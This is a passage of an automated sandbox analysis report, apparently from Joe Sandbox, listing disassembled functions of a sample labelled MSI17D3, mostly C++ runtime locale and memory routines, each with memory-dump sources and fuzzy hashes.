                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCEA9E
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCEAA8
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CCEAE2
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCEAF9
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEB19
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: 47884191770becd58bd991eb2f9ff2a41adca59337d35f062cf69d033285ba33
                                                                                                                                                                                • Instruction ID: a5cd91151491cd5d49dfb88af905adc00fcf47b157d96ebaa4fd4b322f75b255
                                                                                                                                                                                • Opcode Fuzzy Hash: 47884191770becd58bd991eb2f9ff2a41adca59337d35f062cf69d033285ba33
                                                                                                                                                                                • Instruction Fuzzy Hash: FE01C032D00219DFCB15EBA4D851BBE7765BF80320F24050EE515AB392CF309E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCEB33
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCEB3D
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CCEB77
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCEB8E
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEBAE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: 62def3ad9754684978a4e8bbe35503144974e340ed92303f13239ae27d980fab
                                                                                                                                                                                • Instruction ID: ca5f7fc73c604fd867c5c2acd333adb1d9ab4cb8d3b9b41bd755959e3ee90e22
                                                                                                                                                                                • Opcode Fuzzy Hash: 62def3ad9754684978a4e8bbe35503144974e340ed92303f13239ae27d980fab
                                                                                                                                                                                • Instruction Fuzzy Hash: A501C031900219DFCB05EBA4D891FBEB765AF84710F24040EE515AB3D2CF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2B27
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2B31
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CC2B6B
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2B82
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2BA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: e74b6dfed0240e1de0180177ea8f32d699bcb3b59297d4e8fe31037665ea8166
                                                                                                                                                                                • Instruction ID: cce5eadf5b9d1670591a2965ed8efcd570c99658499806d0830664d78b0d3e9a
                                                                                                                                                                                • Opcode Fuzzy Hash: e74b6dfed0240e1de0180177ea8f32d699bcb3b59297d4e8fe31037665ea8166
                                                                                                                                                                                • Instruction Fuzzy Hash: F101C031900219DBCB15EFA4D851FBE7775AF84720F24040EE615AB392CF709E00EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2D7B
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2D85
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • numpunct.LIBCPMT ref: 00CC2DBF
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2DD6
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2DF6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 743221004-0
                                                                                                                                                                                • Opcode ID: 237f6058d8f33b34241721b1c307b789888c73e5e05fafd9773c10088a635839
                                                                                                                                                                                • Instruction ID: ec5d850a9fc7fa1eda9610999367fdaa13e9353786357ca551412f8c34a81716
                                                                                                                                                                                • Opcode Fuzzy Hash: 237f6058d8f33b34241721b1c307b789888c73e5e05fafd9773c10088a635839
                                                                                                                                                                                • Instruction Fuzzy Hash: 4401DE35900219DFCB15EBA0D841BBEB7A5BF94310F24080EF515AB392CF709E01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
                                                                                                                                                                                • RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02
                                                                                                                                                                                • SetEvent.KERNEL32(?,00CB2427,00D0E638,00CF6B40), ref: 00CD2D0C
                                                                                                                                                                                • ResetEvent.KERNEL32(?,00CB2427,00D0E638,00CF6B40), ref: 00CD2D18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3916383385-0
                                                                                                                                                                                • Opcode ID: ee19b692740c4a30d5a9447956ca1a5d4a475aca654b9e66b49a357d419932ee
                                                                                                                                                                                • Instruction ID: 4d6487998f5115a9876712e748429f81f2a8fd795ee25bcf906b4a1a948ea7ca
                                                                                                                                                                                • Opcode Fuzzy Hash: ee19b692740c4a30d5a9447956ca1a5d4a475aca654b9e66b49a357d419932ee
                                                                                                                                                                                • Instruction Fuzzy Hash: F3014232A14320DFCB15AF58FC08BA87BA6FF49341700056AF90AC3320CB305941EBB1
                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000018,665E9022,?,00000000), ref: 00CBBBA3
                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00CBBD7F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 3924972193-2658103896
                                                                                                                                                                                • Opcode ID: 61e67b9219d6bcf9dd493e6d4df56efdafb9e4a98ca79ae8c9c6731809ff9c2a
                                                                                                                                                                                • Instruction ID: 816e93e6b39468cf815dc4444329082c2cc70e5c0c34c732630614d4c55edbac
                                                                                                                                                                                • Opcode Fuzzy Hash: 61e67b9219d6bcf9dd493e6d4df56efdafb9e4a98ca79ae8c9c6731809ff9c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: EC6192B1D00748DFDB10DFA4C941BDEBBB8FF14304F14425AE955AB281E7B5AA48CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CCD3D2
                                                                                                                                                                                  • Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CCD46E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                • String ID: %.0Lf$0123456789-
                                                                                                                                                                                • API String ID: 2544715827-3094241602
                                                                                                                                                                                • Opcode ID: cbfcf7890155f39d0d1cd10f0944c56e9e0ee261ecda2a64ce847d5546323414
                                                                                                                                                                                • Instruction ID: 8a46d9cad9163955f1ae7b802314bab11e96a75ca7eeba81fde31ebf40c8bb5d
                                                                                                                                                                                • Opcode Fuzzy Hash: cbfcf7890155f39d0d1cd10f0944c56e9e0ee261ecda2a64ce847d5546323414
                                                                                                                                                                                • Instruction Fuzzy Hash: DB414B31900218DFCF15DFA4C880EEDBBB5FF08314F104169E915AB256DB30EA56DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CCD676
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CCD712
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                • String ID: 0123456789-$0123456789-
                                                                                                                                                                                • API String ID: 3042121994-2494171821
                                                                                                                                                                                • Opcode ID: 706fce19bb0dd704838c6102d2e64a12396c2b7beed3c82c497c1b4ea502f62e
                                                                                                                                                                                • Instruction ID: 9b11308fb64fd0d45d2a8bc46bfca078a27092df1ab261a7473c330a82a9d1c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 706fce19bb0dd704838c6102d2e64a12396c2b7beed3c82c497c1b4ea502f62e
                                                                                                                                                                                • Instruction Fuzzy Hash: F7416C71900218DFCF15DFA4C880AEEBBB5FF08310F100169F912AB255DB30EA56DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CD1761
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CD17FB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                • String ID: 0123456789-$0123456789-
                                                                                                                                                                                • API String ID: 3042121994-2494171821
                                                                                                                                                                                • Opcode ID: d63fdb7750223fc838d4fd01d220c6fe8c56195646cf2cd5b092d93233be9542
                                                                                                                                                                                • Instruction ID: a37e81d5b8e00a1b05d908bcac8f252fc5c581047ef9e25a6efff3cfb7a70d63
                                                                                                                                                                                • Opcode Fuzzy Hash: d63fdb7750223fc838d4fd01d220c6fe8c56195646cf2cd5b092d93233be9542
                                                                                                                                                                                • Instruction Fuzzy Hash: 80415B31900209EFCF15DFA8D881AEEBBB5FF04310F11415AFA11AB252DB34DA46EB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC838D
                                                                                                                                                                                  • Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C62
                                                                                                                                                                                  • Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C7F
                                                                                                                                                                                  • Part of subcall function 00CC1C42: _Maklocstr.LIBCPMT ref: 00CC1C9C
                                                                                                                                                                                  • Part of subcall function 00CC1C42: _Maklocchr.LIBCPMT ref: 00CC1CAE
                                                                                                                                                                                  • Part of subcall function 00CC1C42: _Maklocchr.LIBCPMT ref: 00CC1CC1
                                                                                                                                                                                • _Mpunct.LIBCPMT ref: 00CC841A
                                                                                                                                                                                • _Mpunct.LIBCPMT ref: 00CC8434
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                • String ID: $+xv
                                                                                                                                                                                • API String ID: 2939335142-1686923651
                                                                                                                                                                                • Opcode ID: fb17ea11e3ccac4e018296a296c64d790095ba57aba7db64493edfa6837fe567
                                                                                                                                                                                • Instruction ID: 1abe9bb3896fffc6b7d2aa8f15e5a6d72fdc3f0c46daab542df9c9991f8b697c
                                                                                                                                                                                • Opcode Fuzzy Hash: fb17ea11e3ccac4e018296a296c64d790095ba57aba7db64493edfa6837fe567
                                                                                                                                                                                • Instruction Fuzzy Hash: 7721B6B1904B926ED725DF75C490B7BBEF8AB09300F08455EF459C7A42D730E606DBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Mpunct$H_prolog3
                                                                                                                                                                                • String ID: $+xv
                                                                                                                                                                                • API String ID: 4281374311-1686923651
                                                                                                                                                                                • Opcode ID: 3ac499e26f84267f8fb8d7c4782713bddf8c5c8d3092727cbb3ac9b8e96590ab
                                                                                                                                                                                • Instruction ID: 152fa165dfced5aa7032d6ed907ef0c19f08b1c8e6dcf46ba60231a89358dc38
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ac499e26f84267f8fb8d7c4782713bddf8c5c8d3092727cbb3ac9b8e96590ab
                                                                                                                                                                                • Instruction Fuzzy Hash: EB21B2B1804B916FD725DF79C494B7BBEF8AB09300F14491EE5A9C7A42D730E601DB90
                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00CB1434,?,00000000), ref: 00CB2569
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00CB1434,?,00000000), ref: 00CB2589
                                                                                                                                                                                • LocalFree.KERNEL32(?,00CB1434,?,00000000), ref: 00CB25DF
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,665E9022,?,00000000,00CF3C40,000000FF,00000008,?,?,?,?,00CB1434,?,00000000), ref: 00CB2633
                                                                                                                                                                                • LocalFree.KERNEL32(?,665E9022,?,00000000,00CF3C40,000000FF,00000008,?,?,?,?,00CB1434), ref: 00CB2647
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1291444452-0
                                                                                                                                                                                • Opcode ID: 3df1dfc3d1bd90987751af4632c7deccdbddda2aacae244b2355a18ff34899fd
                                                                                                                                                                                • Instruction ID: 74d306108debfc72b7707cbfa9740c8dd64f1819f2f0834dbd96d4ac02ce7365
                                                                                                                                                                                • Opcode Fuzzy Hash: 3df1dfc3d1bd90987751af4632c7deccdbddda2aacae244b2355a18ff34899fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 1441D7726042159BC7249F68D894BEAB7D8EB49360F10472AF566C76E0EB30DD48C7A1
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(665E9022,?,00000000,?), ref: 00CF1DFE
                                                                                                                                                                                  • Part of subcall function 00CEA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00CE6F5E,?,00000000,-00000008), ref: 00CEAA67
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CF2059
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CF20A1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00CF2144
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                • Opcode ID: c666bf4b438318aa0fecc34ab9fec745df55b6dcc757636cccb4c4cb45420dad
                                                                                                                                                                                • Instruction ID: 72a8b3db0788bcdf81b9d70fafcfb3258d975f5dce1844b9613bda3d6a93468b
                                                                                                                                                                                • Opcode Fuzzy Hash: c666bf4b438318aa0fecc34ab9fec745df55b6dcc757636cccb4c4cb45420dad
                                                                                                                                                                                • Instruction Fuzzy Hash: 89D15975D002589FCF15CFA8D880AEDBBB5FF09310F18856AEA26EB351D730A941CB55
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CD011D
                                                                                                                                                                                • collate.LIBCPMT ref: 00CD0126
                                                                                                                                                                                  • Part of subcall function 00CCEDF2: __EH_prolog3_GS.LIBCMT ref: 00CCEDF9
                                                                                                                                                                                  • Part of subcall function 00CCEDF2: __Getcoll.LIBCPMT ref: 00CCEE5D
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00CD016C
                                                                                                                                                                                • numpunct.LIBCPMT ref: 00CD03C4
                                                                                                                                                                                  • Part of subcall function 00CB6330: LocalAlloc.KERNEL32(00000040,?,00CC0E04,00000020,?,?,00CB9942,00000000,665E9022,?,?,?,?,00CF50DD,000000FF), ref: 00CB6336
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
